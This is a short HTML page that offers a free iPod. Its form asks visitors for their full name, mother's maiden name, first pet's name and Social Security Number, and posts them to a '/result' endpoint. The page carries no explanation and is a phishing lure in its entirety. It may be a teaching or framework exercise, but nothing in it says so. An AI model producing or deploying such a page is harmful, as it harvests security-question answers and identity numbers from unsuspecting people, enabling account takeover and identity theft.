<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h1>Win free iPod</h1>
    <form action='/result' method="post">
        Full name: <input type="text" name="full_name" id=""><br>
        Mother's maiden name: <input type="text" name="mothers_maiden_name" id=""><br>
        Name of my first pet: <input type="text" name="first_pet" id=""><br>
        Social Security Number: <input type="number" name="social_security" id=""><br>
        <input type="submit">
    </form>
</body>
</html>